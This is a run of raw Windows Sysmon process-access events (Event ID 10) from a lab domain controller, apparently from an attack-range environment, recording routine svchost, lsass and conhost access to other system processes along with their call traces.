13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.333{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.333{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.254{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.254{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.208{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-9027-6005-1401-00000000A301}47764740C:\Windows\system32\conhost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-9027-6005-1301-00000000A301}4804864C:\Windows\system32\conhost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 